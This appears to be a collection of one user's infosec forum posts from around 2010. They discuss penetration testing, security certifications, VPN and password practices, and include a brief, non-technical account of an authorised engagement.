I'm with sil and ketchup; I think exploitation is a crucial aspect of penetration testing. As mentioned earlier, it seems like there is some confusion when it comes to terminology. Identifying and reporting vulnerabilities is much better classified as a vulnerability assessment. It doesn't make sense to label something a penetration test if there are no attempts to penetrate. While there are other ways to compromise a system (i.e. password guessing), exploitation is one of (if not the most) effective methods.

I think some of you are over-hyping exploitation and "automated" tools. While it's always possible that someone may have a severely out-of-date domain controller or a password of "Password1", I've found that it's very rare to own a network with just a few clicks.

Here's a personal example of how exploitation provided much more meaningful results for a test of mine: I found a Linux server that was running exclusively as a web server. It only had the default Apache page accessible, but a reverse DNS lookup returned a meaningful name, so it was clearly being used for something. I was curious, so I busted out DirBuster. A few seconds later I was playing around with some obscure open-source helpdesk/ticketing system. I researched it a bit, and lo-and-behold, there was a publicly available exploit for it.

It provided a shell on the system. The system was locked down for the most part, but I was able to get a MySQL username and password from settings.php. From there, I queried the helpdesk database's users table. The administrator's password hash was cracked in a few seconds, and it got me into a few other systems.

Unfortunately, this all transpired shortly before the end of the engagement, and I wasn't able to completely compromise their network. However, you can see how this provided much more meaningful results than saying, "Your helpdesk web app is vulnerable." No one would have cared about that at all.

You should ideally get management to formally disallow that in your information security policies. If you have a problem with users disobeying policies, you could look at NAC, 802.1x, etc.

VPN access is best used only on corporate laptops that you have control over. You're right that there's not much difference between bringing in random machines and allowing random machines to establish VPN connections. Although, this can obviously vary quite a bit based on how you're implementing VLANs, DMZs, ACLs, etc.

Yea, I keep forgetting about that since I've had my CompTIA certs for awhile. That's an excellent point to consider for anyone considering the A+, Net+, and/or Sec+ in 2010.

I think you're really going to make things harder on yourself in the long run if you don't master the fundamentals first. To be completely candid, I don't think a "basic understanding" is sufficient.

At the same time, that doesn't mean you have to work on something like the Network+ exclusively. Pace yourself and keep tinkering around with whatever else you find interesting.

As mentioned, The CompTIA exams are pretty basic. If you're not at that level, you're really going to struggle with the CEH.

Let me be clear, you don't need those certifications, you need the knowledge. I've never taken the Network+, and I never will. I just want to stress the importance of mastering the fundamentals. No one wants to be a script kiddie

Yea, OffSec only lets you schedule a couple of weeks out. They add a date every week

I'm also with the consensus that you should do the CEH first. That's definitely a foundation you want for the OSCP.

I really don't understand the logic; I think you should stick with your first plan.

If you're going to do those other certifications, why not build a solid foundation and work your way up? The CEH material, especially the self-study books, certainly does not cover everything that is on the exam (or that you should know to be at that level).

You obviously don't need to take the exams, but if you want them, and you're working through the material anyway, I don't see any value in postponing them (unless it's a financial issue).

Congrats dude!

I was going to warn you against this as well. Some ISPs prohibit this completely while others will sell you a premium service where those types of activities are acceptable. I'd definitely check with your ISP before doing anything.

You need to understand people are trying to protect you as well. You really should have a signed, written contract. You may find that the person who gave you permission to do this doesn't actually have the authority to do so. Or he passes the blame on to you if something goes wrong. You're also subject to the laws of countries you're in, the target's in, and any country the packets pass through (they may not go in a straight line). You could quickly find yourself in serious trouble and ruin your career. It's a point that's worth bringing up, even if you only want technical information.

P.S. Run Dir Buster against the web server. Maybe you'll find some interesting web apps.

The Jang RHCE book will be another great reference for you: http://www.amazon.com/Certified-Engineer-Linux-Study-Certification/dp/0072264543/ref=sr_1_1?ie=UTF8&s=books&qid=1273457465&sr=8-1

Congratulations!

Do you have any recommendations for anyone looking to self-study this material?

Isn't Express going to run on the Framework? I don't think they're going to be independent products. It seems like Express is adding a GUI, automation, reporting, etc.

Using a key like what I posted is going to give you a very secure connection. One of the main advantages of moving to Enterprise from PSK is key distribution, which isn't a big concern when you only have a small number of users.

You'll want to check out this book: http://www.wiresharkbook.com/

The capture and/or display filters will help you work with the data much more easily. It's overwhelming if you just look at everything simultaneously.

I like KeePass a lot. I think 32 random characters is overkill for most sites. Password length and complexity should be proportionate to the sensitivity of data/level of access. Random forums probably don't need passwords as strong as the ones for your bank accounts. It's also important to reuse passwords as little as possible. If a forum gets compromised, you don't want that to be the same info for critical accounts.

You might want to consider passphrases as well. They're much more easier to remember, yet they are still complex from a guessing perspective.

For example: Dinner?Pizza&17Beers!

It's going to be as strong as they key you choose to use. It's not going to be secure if you use 'a' as your key. I get something from here and copy-paste into my devices: https://www.grc.com/passwords.htm

I VPN back somewhere if I'm using the connection for something I wouldn't want people to eavesdrop on. If you're just using it to check the news, watch YouTube, etc. it may not be necessary. Be wary of what cookies are transmitted or any other service that'll be logging on in the background though.

Packet sniffing is always a good thing to do (assuming you have permission and are doing so ethically). It's good to get used to seeing how things work.

http://www.owasp.org/index.php/OWASP_Testing_Project and http://www.amazon.com/Web-Application-Hackers-Handbook-Discovering/dp/0470170778/ref=sr_1_2?ie=UTF8&s=books&qid=1272127661&sr=8-2 should get you in pretty good shape. I haven't taken this myself, so I'm not sure if that'll cover everything.

However, you can two practice exams if you challenge the exam, and those should provide additional insight into what else (if anything) you need to work on.

You'll obviously need to understand HTML, Javascript, etc. as well.